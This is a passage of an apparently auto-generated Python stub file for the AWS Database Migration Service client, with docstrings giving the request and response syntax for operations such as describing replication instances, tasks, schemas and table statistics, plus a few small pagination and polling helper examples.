An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn:
The ARN of the replication instance.
:type Filters: list
:param Filters:
Filters applied to the describe action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:rtype: dict
:returns:
"""
pass
def describe_refresh_schemas_status(self, EndpointArn: str) -> Dict:
"""
Returns the status of the RefreshSchemas operation.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeRefreshSchemasStatus>`_
**Request Syntax**
::
response = client.describe_refresh_schemas_status(
EndpointArn='string'
)
**Response Syntax**
::
{
'RefreshSchemasStatus': {
'EndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'Status': 'successful'|'failed'|'refreshing',
'LastRefreshDate': datetime(2015, 1, 1),
'LastFailureMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
- **RefreshSchemasStatus** *(dict) --*
The status of the schema.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **Status** *(string) --*
The status of the schema.
- **LastRefreshDate** *(datetime) --*
The date the schema was last refreshed.
- **LastFailureMessage** *(string) --*
The last failure message for the schema.
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
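Since ``Status`` settles to either ``successful`` or ``failed`` after ``refreshing``, callers often poll this operation after starting a schema refresh. A minimal sketch (the ``wait_for_refresh`` helper and its timing values are hypothetical; ``client`` is assumed to be a DMS client exposing this method):

```python
import time

def wait_for_refresh(client, endpoint_arn, delay=5.0, max_attempts=60):
    """Poll describe_refresh_schemas_status until Status leaves 'refreshing'.

    Returns the final RefreshSchemasStatus dict, or raises TimeoutError
    if the refresh does not settle within max_attempts polls.
    `client` is assumed to be a boto3 DMS client.
    """
    for _ in range(max_attempts):
        status = client.describe_refresh_schemas_status(
            EndpointArn=endpoint_arn)['RefreshSchemasStatus']
        if status['Status'] != 'refreshing':
            # Either 'successful' or 'failed'; the caller inspects which.
            return status
        time.sleep(delay)
    raise TimeoutError('schema refresh did not settle in time')
```

On a ``failed`` result, ``LastFailureMessage`` in the returned dict carries the error detail.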
:rtype: dict
:returns:
"""
pass
def describe_replication_instance_task_logs(self, ReplicationInstanceArn: str, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the task logs for the specified task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationInstanceTaskLogs>`_
**Request Syntax**
::
response = client.describe_replication_instance_task_logs(
ReplicationInstanceArn='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'ReplicationInstanceArn': 'string',
'ReplicationInstanceTaskLogs': [
{
'ReplicationTaskName': 'string',
'ReplicationTaskArn': 'string',
'ReplicationInstanceTaskLogSize': 123
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstanceTaskLogs** *(list) --*
An array of replication task log metadata. Each member of the array contains the replication task name, ARN, and task log size (in bytes).
- *(dict) --*
Contains metadata for a replication instance task log.
- **ReplicationTaskName** *(string) --*
The name of the replication task.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationInstanceTaskLogSize** *(integer) --*
The size, in bytes, of the replication task log.
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_instances(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about replication instances for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationInstances>`_
**Request Syntax**
::
response = client.describe_replication_instances(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'ReplicationInstances': [
{
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **ReplicationInstances** *(list) --*
The replication instances described.
- *(dict) --*
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
One or more public IP addresses for the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
One or more private IP addresses for the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: replication-instance-arn | replication-instance-id | replication-instance-class | engine-version
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_subnet_groups(self, Filters: List = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the replication subnet groups.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationSubnetGroups>`_
**Request Syntax**
::
response = client.describe_replication_subnet_groups(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'ReplicationSubnetGroups': [
{
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **ReplicationSubnetGroups** *(list) --*
A description of the replication subnet groups.
- *(dict) --*
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
:type Filters: list
:param Filters:
Filters applied to the describe action.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_task_assessment_results(self, ReplicationTaskArn: str = None, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns the task assessment results from Amazon S3. This action always returns the latest results.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationTaskAssessmentResults>`_
**Request Syntax**
::
response = client.describe_replication_task_assessment_results(
ReplicationTaskArn='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'BucketName': 'string',
'ReplicationTaskAssessmentResults': [
{
'ReplicationTaskIdentifier': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskLastAssessmentDate': datetime(2015, 1, 1),
'AssessmentStatus': 'string',
'AssessmentResultsFile': 'string',
'AssessmentResults': 'string',
'S3ObjectUrl': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **BucketName** *(string) --*
The Amazon S3 bucket where the task assessment report is located.
- **ReplicationTaskAssessmentResults** *(list) --*
The task assessment report.
- *(dict) --*
The task assessment report in JSON format.
- **ReplicationTaskIdentifier** *(string) --*
The replication task identifier of the task on which the task assessment was run.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskLastAssessmentDate** *(datetime) --*
The date the task assessment was completed.
- **AssessmentStatus** *(string) --*
The status of the task assessment.
- **AssessmentResultsFile** *(string) --*
The file containing the results of the task assessment.
- **AssessmentResults** *(string) --*
The task assessment results in JSON format.
- **S3ObjectUrl** *(string) --*
The URL of the S3 object containing the task assessment results.
:type ReplicationTaskArn: string
:param ReplicationTaskArn:
The Amazon Resource Name (ARN) string that uniquely identifies the task. When this input parameter is specified, the API returns only one result and ignores the values of the ``MaxRecords`` and ``Marker`` parameters.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_replication_tasks(self, Filters: List = None, MaxRecords: int = None, Marker: str = None, WithoutSettings: bool = None) -> Dict:
"""
Returns information about replication tasks for your account in the current region.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeReplicationTasks>`_
**Request Syntax**
::
response = client.describe_replication_tasks(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string',
WithoutSettings=True|False
)
**Response Syntax**
::
{
'Marker': 'string',
'ReplicationTasks': [
{
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
},
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **ReplicationTasks** *(list) --*
A description of the replication tasks.
- *(dict) --*
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position "2018-03-08T12:12:12"
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position "mysql-bin-changelog.000024:373"
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position "server_time:2018-02-09T12:12:12"
Commit time example: --cdc-stop-position "commit_time:2018-02-09T12:12:12"
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type Filters: list
:param Filters:
Filters applied to the describe action.
Valid filter names: replication-task-arn | replication-task-id | migration-type | endpoint-arn | replication-instance-arn
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type WithoutSettings: boolean
:param WithoutSettings:
Set this flag to ``True`` to avoid returning task settings in the response. This reduces overhead when the settings are large. The default is ``False``.
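The ``Filters`` parameter accepts only the documented filter names (``replication-task-arn``, ``replication-task-id``, ``migration-type``, ``endpoint-arn``, ``replication-instance-arn``). A minimal sketch of building that list (the ``build_task_filters`` helper is hypothetical, not part of the API):

```python
def build_task_filters(migration_type=None, instance_arn=None):
    """Build a Filters list for describe_replication_tasks.

    Uses only the documented filter names; the helper itself is a
    hypothetical convenience, not part of the API.
    """
    filters = []
    if migration_type:
        filters.append({'Name': 'migration-type',
                        'Values': [migration_type]})
    if instance_arn:
        filters.append({'Name': 'replication-instance-arn',
                        'Values': [instance_arn]})
    return filters

# Usage sketch (client assumed to be a boto3 DMS client):
# response = client.describe_replication_tasks(
#     Filters=build_task_filters(migration_type='cdc'),
#     WithoutSettings=True)
```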
:rtype: dict
:returns:
"""
pass
def describe_schemas(self, EndpointArn: str, MaxRecords: int = None, Marker: str = None) -> Dict:
"""
Returns information about the schema for the specified endpoint.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeSchemas>`_
**Request Syntax**
::
response = client.describe_schemas(
EndpointArn='string',
MaxRecords=123,
Marker='string'
)
**Response Syntax**
::
{
'Marker': 'string',
'Schemas': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
- **Schemas** *(list) --*
The described schemas.
- *(string) --*
:type EndpointArn: string
:param EndpointArn: **[REQUIRED]**
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:rtype: dict
:returns:
"""
pass
def describe_table_statistics(self, ReplicationTaskArn: str, MaxRecords: int = None, Marker: str = None, Filters: List = None) -> Dict:
"""
Returns table statistics on the database migration task, including table name, rows inserted, rows updated, and rows deleted.
Note that the "last updated" column in the DMS console only indicates the time that AWS DMS last updated the table statistics record for a table. It does not indicate the time of the last update to the table itself.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/DescribeTableStatistics>`_
**Request Syntax**
::
response = client.describe_table_statistics(
ReplicationTaskArn='string',
MaxRecords=123,
Marker='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
**Response Syntax**
::
{
'ReplicationTaskArn': 'string',
'TableStatistics': [
{
'SchemaName': 'string',
'TableName': 'string',
'Inserts': 123,
'Deletes': 123,
'Updates': 123,
'Ddls': 123,
'FullLoadRows': 123,
'FullLoadCondtnlChkFailedRows': 123,
'FullLoadErrorRows': 123,
'LastUpdateTime': datetime(2015, 1, 1),
'TableState': 'string',
'ValidationPendingRecords': 123,
'ValidationFailedRecords': 123,
'ValidationSuspendedRecords': 123,
'ValidationState': 'string',
'ValidationStateDetails': 'string'
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **TableStatistics** *(list) --*
The table statistics.
- *(dict) --*
- **SchemaName** *(string) --*
The schema name.
- **TableName** *(string) --*
The name of the table.
- **Inserts** *(integer) --*
The number of insert actions performed on a table.
- **Deletes** *(integer) --*
The number of delete actions performed on a table.
- **Updates** *(integer) --*
The number of update actions performed on a table.
- **Ddls** *(integer) --*
The Data Definition Language (DDL) used to build and modify the structure of your tables.
- **FullLoadRows** *(integer) --*
The number of rows added during the Full Load operation.
- **FullLoadCondtnlChkFailedRows** *(integer) --*
The number of rows that failed conditional checks during the Full Load operation (valid only for migrations where DynamoDB is the target).
- **FullLoadErrorRows** *(integer) --*
The number of rows that failed to load during the Full Load operation (valid only for migrations where DynamoDB is the target).
- **LastUpdateTime** *(datetime) --*
The last time AWS DMS updated the table statistics record for the table.
- **TableState** *(string) --*
The state of the tables described.
Valid states: Table does not exist | Before load | Full load | Table completed | Table cancelled | Table error | Table all | Table updates | Table is being reloaded
- **ValidationPendingRecords** *(integer) --*
The number of records that have yet to be validated.
- **ValidationFailedRecords** *(integer) --*
The number of records that failed validation.
- **ValidationSuspendedRecords** *(integer) --*
The number of records that could not be validated.
- **ValidationState** *(string) --*
The validation state of the table.
The parameter can have the following values:
* Not enabled—Validation is not enabled for the table in the migration task.
* Pending records—Some records in the table are waiting for validation.
* Mismatched records—Some records in the table do not match between the source and target.
* Suspended records—Some records in the table could not be validated.
* No primary key—The table could not be validated because it had no primary key.
* Table error—The table was not validated because it was in an error state and some data was not migrated.
* Validated—All rows in the table were validated. If the table is updated, the status can change from Validated.
* Error—The table could not be validated because of an unexpected error.
- **ValidationStateDetails** *(string) --*
Additional details about the state of validation.
- **Marker** *(string) --*
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:type MaxRecords: integer
:param MaxRecords:
The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 500.
:type Marker: string
:param Marker:
An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by ``MaxRecords`` .
:type Filters: list
:param Filters:
Filters applied to the describe table statistics action.
Valid filter names: schema-name | table-name | table-state
A combination of filters creates an AND condition where each record matches all specified filters.
- *(dict) --*
- **Name** *(string) --* **[REQUIRED]**
The name of the filter.
- **Values** *(list) --* **[REQUIRED]**
The filter value.
- *(string) --*
:rtype: dict
:returns:
"""
pass
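The ``Marker`` token drives pagination for this operation. Below is a minimal sketch of collecting every ``TableStatistics`` record for one schema; the task ARN and schema name in the usage comment are placeholders, and the fetch loop assumes a live ``boto3`` DMS client.

```python
# Sketch only: follow the Marker pagination token until it is absent.

def fetch_all_table_statistics(client, task_arn, schema):
    """Collect every TableStatistics record for one schema."""
    stats, marker = [], None
    while True:
        kwargs = {
            'ReplicationTaskArn': task_arn,
            'Filters': [{'Name': 'schema-name', 'Values': [schema]}],
        }
        if marker:
            kwargs['Marker'] = marker
        page = client.describe_table_statistics(**kwargs)
        stats.extend(page['TableStatistics'])
        marker = page.get('Marker')
        if not marker:
            return stats

def total_row_changes(table_stats):
    """Map 'schema.table' to Inserts + Updates + Deletes."""
    return {
        f"{t['SchemaName']}.{t['TableName']}": t['Inserts'] + t['Updates'] + t['Deletes']
        for t in table_stats
    }

# Usage (requires AWS credentials; the ARN is a placeholder):
# import boto3
# client = boto3.client('dms')
# stats = fetch_all_table_statistics(client, 'arn:aws:dms:...:task:EXAMPLE', 'public')
# print(total_row_changes(stats))
```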
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
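For pageable operations, a paginator replaces the manual ``Marker`` loop. The sketch below assumes ``describe_table_statistics`` is pageable for this service and uses a placeholder task ARN; the helper itself works on any iterable of response pages.

```python
# Sketch only: scan paginated describe_table_statistics pages for tables
# in an error state. 'pages' is any iterable of response dictionaries.

def tables_in_error(pages):
    """Yield 'schema.table' for records whose TableState is 'Table error'."""
    for page in pages:
        for t in page.get('TableStatistics', []):
            if t.get('TableState') == 'Table error':
                yield f"{t['SchemaName']}.{t['TableName']}"

# Usage (requires AWS credentials; the ARN is a placeholder):
# import boto3
# client = boto3.client('dms')
# paginator = client.get_paginator('describe_table_statistics')
# pages = paginator.paginate(ReplicationTaskArn='arn:aws:dms:...:task:EXAMPLE')
# print(list(tables_in_error(pages)))
```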
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def import_certificate(self, CertificateIdentifier: str, CertificatePem: str = None, CertificateWallet: bytes = None, Tags: List = None) -> Dict:
"""
Uploads the specified certificate.
